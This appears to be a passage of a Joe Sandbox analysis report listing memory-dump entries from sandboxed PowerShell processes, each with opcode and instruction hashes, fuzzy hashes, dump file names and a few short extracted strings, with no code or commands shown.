                                                                  • Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
                                                                  • Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
                                                                  • Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                  • API String ID: 0-3225005683
                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction ID: 4176c8602b69aee7968f290b64ec331f5eed73d9827c1be3728d877b46de185e
                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                  • Instruction Fuzzy Hash: 952101B76080264ED2027BBDB815DFD3760CB9823434592B2D299CB223EE1470CA8EE0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e66f174cfd4400889413e0893f6a437686c3f35a286802ca514a11e550cb1791
                                                                  • Instruction ID: 672a81dd05e60970a447c99ac9e08954f4389cbcc3011677dd83fb658686d3dc
                                                                  • Opcode Fuzzy Hash: e66f174cfd4400889413e0893f6a437686c3f35a286802ca514a11e550cb1791
                                                                  • Instruction Fuzzy Hash: F2D1476590EB8E8FF756D72888159B97FA0EF46310B2851FEE44DC71D3DA28D809C391
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 328c96d442a3427cc9f4215e5de9d44985796036afc82a2185cde1c3c60e7841
                                                                  • Instruction ID: 705528d7f254268cebc38c80d6a452d9a12ee14f0bf3a5ca182a4792192f3e39
                                                                  • Opcode Fuzzy Hash: 328c96d442a3427cc9f4215e5de9d44985796036afc82a2185cde1c3c60e7841
                                                                  • Instruction Fuzzy Hash: 0981496290EBC7CFF75687684C560F53FA8EF13320F0841BBE089C70A3D919990A9B91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87e7531b094db824a796950e68c3beeb7f0b665864683b140d8b1f9e1cd5d295
                                                                  • Instruction ID: d2522406e144e4d2b9182b796f29b80816f11c9f22e6ea2c7eb19c3c507ee8e8
                                                                  • Opcode Fuzzy Hash: 87e7531b094db824a796950e68c3beeb7f0b665864683b140d8b1f9e1cd5d295
                                                                  • Instruction Fuzzy Hash: 6B6104A7D8EB83CAF606575898561F93BA4EF23355F088072E08D96083ED19A71E57C2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aa56285568754817ee19b9fcba9ce81376ade9a897c0f1be39ef662928faac6a
                                                                  • Instruction ID: 6d1da34fa7ae3d94e05e51c09b8c4fd51db580c274fafde19e80a8814a6f0275
                                                                  • Opcode Fuzzy Hash: aa56285568754817ee19b9fcba9ce81376ade9a897c0f1be39ef662928faac6a
                                                                  • Instruction Fuzzy Hash: 49412D7190CB898FEB189B5CA8066B87FE1FB95311F04816FE04DD3292DA20E959C7C2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2483231262.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac46d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f91d47dc6cc26aff27553a5af96917bba271ba45a5081721253402be6f89d78
                                                                  • Instruction ID: fbe905b5eeaf4710055d23ce245f2a86ac0990272d1d80a288360a6fd3bf7de0
                                                                  • Opcode Fuzzy Hash: 9f91d47dc6cc26aff27553a5af96917bba271ba45a5081721253402be6f89d78
                                                                  • Instruction Fuzzy Hash: 8B41037140EBC49FE7568B28D8559523FF0EF53324B1905EFE088CB1A7D625E84AC7A2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
                                                                  • Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
                                                                  • Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
                                                                  • Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
                                                                  • Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
                                                                  • Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                  • API String ID: 0-1031638419
                                                                  • Opcode ID: a54de3a7bcd74ae262807ef1770589f700c42625eb989c2a9c45b9979aeefd82
                                                                  • Instruction ID: 49bc5aa737043e8c7eb89f430a3889cf18853d7f13f286a37abe77a902f02d8a
                                                                  • Opcode Fuzzy Hash: a54de3a7bcd74ae262807ef1770589f700c42625eb989c2a9c45b9979aeefd82
                                                                  • Instruction Fuzzy Hash: 9221EFB77484165F920276BEB8019EC7394DB9827634891B3D358CB623DE14B08B8ED0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                  • API String ID: 0-2357752022
                                                                  • Opcode ID: 266fc3b0a43f60fc5477e833f2047b56fbab7ff41f129f09e93bace930c8dede
                                                                  • Instruction ID: 148d5fae116ce5ef486ea707b966bd16aa0679e8895353e81e5cb51a0e75671e
                                                                  • Opcode Fuzzy Hash: 266fc3b0a43f60fc5477e833f2047b56fbab7ff41f129f09e93bace930c8dede
                                                                  • Instruction Fuzzy Hash: 11516FA294FBC38BF65A436458660B56FE4EF13324F0D91F6E09C4A0D3E91DA94A9381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 9c3a3372bf58c7d71dcabb1bf674883960aa83878b4fdc7cc6ed7f8e4ba9f261
                                                                  • Instruction ID: de948dda01b926eb1ce40033bfd78a011715af20a4417cee743e8ee600fc5abe
                                                                  • Opcode Fuzzy Hash: 9c3a3372bf58c7d71dcabb1bf674883960aa83878b4fdc7cc6ed7f8e4ba9f261
                                                                  • Instruction Fuzzy Hash: D3D16C74A18A8E8FEF84DB58C454AA97BF1FF69300F14816AE40DD7296CE35E845CBC1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d49a9b60b4f2204ababf793b5c20c58483ddec2abcaa3ef286348749ed6738e
                                                                  • Instruction ID: ba2ab9cb5a717fca6256939186c9602f9e59c99e17d04904f4a226a7deeda2f9
                                                                  • Opcode Fuzzy Hash: 6d49a9b60b4f2204ababf793b5c20c58483ddec2abcaa3ef286348749ed6738e
                                                                  • Instruction Fuzzy Hash: 38D13771D0EA8A8FF756DB6898159B9BBA0EF66310B0451FED44DC70D3EA18DC09C391
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba0bd51354afc0f57ac32cee997cef0b6927b6a9f1821c9270eae3229ebef1cd
                                                                  • Instruction ID: 816fca0f2f4ad2950a9e1a6b53821b90bfe87227e9d16e869ecde8a4ccb148ab
                                                                  • Opcode Fuzzy Hash: ba0bd51354afc0f57ac32cee997cef0b6927b6a9f1821c9270eae3229ebef1cd
                                                                  • Instruction Fuzzy Hash: C1412C7191DB899FE718AF5CAC065A97BE1FB96310F14817FF04D83282DA25E81687C2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2495663654.00007FFAAC43D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac43d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d628ae702b7e741ca74bb98c12dd57633c22883d4dd6c57314c80a1b58b0b30b
                                                                  • Instruction ID: f02556415c2349719909d5a869b09dfd6786faf47ecacb80ca9df8399f1f5bd8
                                                                  • Opcode Fuzzy Hash: d628ae702b7e741ca74bb98c12dd57633c22883d4dd6c57314c80a1b58b0b30b
                                                                  • Instruction Fuzzy Hash: E141067141EBC48FE7579B2898459523FF0EF97324B1905DFD088CB1A3D629E84AC792
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 584d5bc2e692fe4bf3547aedc91702761fd54a3e0d9a8a509513b56a025d34d7
                                                                  • Instruction ID: 99e14fc26ac2e7ade9dc9cc544655119c0028a6e1ce4d584925adab778fb28c5
                                                                  • Opcode Fuzzy Hash: 584d5bc2e692fe4bf3547aedc91702761fd54a3e0d9a8a509513b56a025d34d7
                                                                  • Instruction Fuzzy Hash: 2321373190C64C8FEB599B6C884A6F67BE0EB97330F00426FD049C3166DA75A45BCB91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
                                                                  • Instruction ID: 87c92194a9c8ca92cf7d347763fdbff49970a13b3841e7c388c0eef808e905fe
                                                                  • Opcode Fuzzy Hash: 8607e7f85c2bb2a5020c6518f23c7702bb5abb07c74586bc1031166d3bd47eca
                                                                  • Instruction Fuzzy Hash: C701677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d40d0001dfbad5b27b612d5cc959cb3e6e4e72fbac97dd3c922d7ada1075b527
                                                                  • Instruction ID: 9e142046767cd15c8166be7a8884960ea1256acfb8cb775b405053e33d7a9aff
                                                                  • Opcode Fuzzy Hash: d40d0001dfbad5b27b612d5cc959cb3e6e4e72fbac97dd3c922d7ada1075b527
                                                                  • Instruction Fuzzy Hash: 86F0BE32A0D5048FE759EB5CE4498B8B7E0EF5532071190BAE05DC75A3DE25EC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36dd9203ec2abfe46b4009b5a0ee3d4ebf1b9c5ac0183970101288fd33ca6e3d
                                                                  • Instruction ID: 42ff0e9889862176b50c4e4c6457dec23d82ca69ed8822d5649c19db6694f6a3
                                                                  • Opcode Fuzzy Hash: 36dd9203ec2abfe46b4009b5a0ee3d4ebf1b9c5ac0183970101288fd33ca6e3d
                                                                  • Instruction Fuzzy Hash: D5F0BE32A0D5448FE759EB1CE0458E8BBE0EF05320B51A0F6E04DCB463EA25EC44C790
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2529538283.00007FFAAC620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac620000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: bc8c278daae929def9611b568d391ac05cb36f07f469423249f3519339791733
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: 24E01A31B0C809CFEA69DB0CE0449B9B3E1EB9936171161B7D14EC7561DA22EC559BC0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: O_^$O_^$O_^$O_^
                                                                  • API String ID: 0-109995703
                                                                  • Opcode ID: 13ef5d4ab1ffc2b4400616bd8c3f4523edcec4f8692a2c02cdf8646ee65736cd
                                                                  • Instruction ID: bda8ee58ac2067c5f1c834c6078c9d891ce945a4c80e0b2c75e50ce80fca5927
                                                                  • Opcode Fuzzy Hash: 13ef5d4ab1ffc2b4400616bd8c3f4523edcec4f8692a2c02cdf8646ee65736cd
                                                                  • Instruction Fuzzy Hash: 4851A692D8F7C78FF359476914591A52FE4AF63254F0D40FAE08D8B1D3EC1AA80E46D2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2507066715.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: O_^4$O_^7$O_^F$O_^J
                                                                  • API String ID: 0-875994666
                                                                  • Opcode ID: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                  • Instruction ID: c8459bde14b5f22ca8587999488443d1d304aeefbe1c251420472257b9d3983f
                                                                  • Opcode Fuzzy Hash: 2e885493dd975bc32d340c5768cef525a19cc6b18a019490f26335b263fa7f1c
                                                                  • Instruction Fuzzy Hash: F621FFBB6180268ED2027B7DB814DE93790CFD823674542B2E19ECE353ED1470CA8E90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: X7+
                                                                  • API String ID: 0-4292316761
                                                                  • Opcode ID: adf48b21ff5e3c76ea68c822407a18dfe3fd4cae52e4beb7f0ffaff09c5fe805
                                                                  • Instruction ID: f868f55b90b11b28167940af23a1dfbc7cdb99eefe2bcfd5a14b37f638ee8f29
                                                                  • Opcode Fuzzy Hash: adf48b21ff5e3c76ea68c822407a18dfe3fd4cae52e4beb7f0ffaff09c5fe805
                                                                  • Instruction Fuzzy Hash: 70D1676690EB8E8FF756D72888155B97FE0EF56210B2851FEE04EC71D3DA28D809C391
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d42cf9ce9f38ed6f845607773d22025d02e104fc07b678b22882d43d1a115811
                                                                  • Instruction ID: 68f32f9a9e35f7b0dede9dbe6d9aba0331af0c61b0cc20a84735fbaac78cc763
                                                                  • Opcode Fuzzy Hash: d42cf9ce9f38ed6f845607773d22025d02e104fc07b678b22882d43d1a115811
                                                                  • Instruction Fuzzy Hash: 58812A3091CA4D8FDB59DB6C98496F97BE0EF56321F04426FD049C32A2DA74A846C791
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5867e82b627e084c25db54f9d538f73b9deaaae0d01d8e73e8e0d3ff69c4652
                                                                  • Instruction ID: 1174a37723b14f80b13a0b7251949fad8d0874410235d35b91a697ffc860a3a2
                                                                  • Opcode Fuzzy Hash: a5867e82b627e084c25db54f9d538f73b9deaaae0d01d8e73e8e0d3ff69c4652
                                                                  • Instruction Fuzzy Hash: 9251267190DB868FE349DB6888954747BE0EF56314B1881BEE48EC7193ED29E80BC791
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14a7c90e9710a7ce76b920882d9f5a8c8fb200f19b2216f33c6873aa42dd2814
                                                                  • Instruction ID: f4684065c5f456bb0746e7a34a502f1b937ced11d9de6ca04c63eedc6c2ae30a
                                                                  • Opcode Fuzzy Hash: 14a7c90e9710a7ce76b920882d9f5a8c8fb200f19b2216f33c6873aa42dd2814
                                                                  • Instruction Fuzzy Hash: 18412071A0DB495FEB089F5CAC465B97BE1FB96310F14417FE04CC3242DA20E91987C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2545267609.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac46d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f06013f6553ad84968f298e91994a582fa4acd4e2ef3bbe45c3fa54c1e20ba7
                                                                  • Instruction ID: 14b57073be2f2c8cc97008e1c8ee820fd50c338b01d7203c805badfa22a187b7
                                                                  • Opcode Fuzzy Hash: 5f06013f6553ad84968f298e91994a582fa4acd4e2ef3bbe45c3fa54c1e20ba7
                                                                  • Instruction Fuzzy Hash: B941167080EBC48FE7568B3998559527FF0EF57224B1901EFE088CB1A7D625E84AC7D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a02b1573c0b2e31f7340fdc16ce2fc2683683fcd264e422f593568e7581b8ec8
                                                                  • Instruction ID: 46374cad7941ea882d3de050237edbc968580484a9b6ab3aa06b5e070143708c
                                                                  • Opcode Fuzzy Hash: a02b1573c0b2e31f7340fdc16ce2fc2683683fcd264e422f593568e7581b8ec8
                                                                  • Instruction Fuzzy Hash: 0921A7A6D8FE87CBFB559B5858561F43BA4EF22310F048076E44C57093EE19E60E57C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2553079732.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac580000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
                                                                  • Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
                                                                  • Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
                                                                  • Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
                                                                  • Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2562358343.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_7ffaac650000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
                                                                  • Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
                                                                  • Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
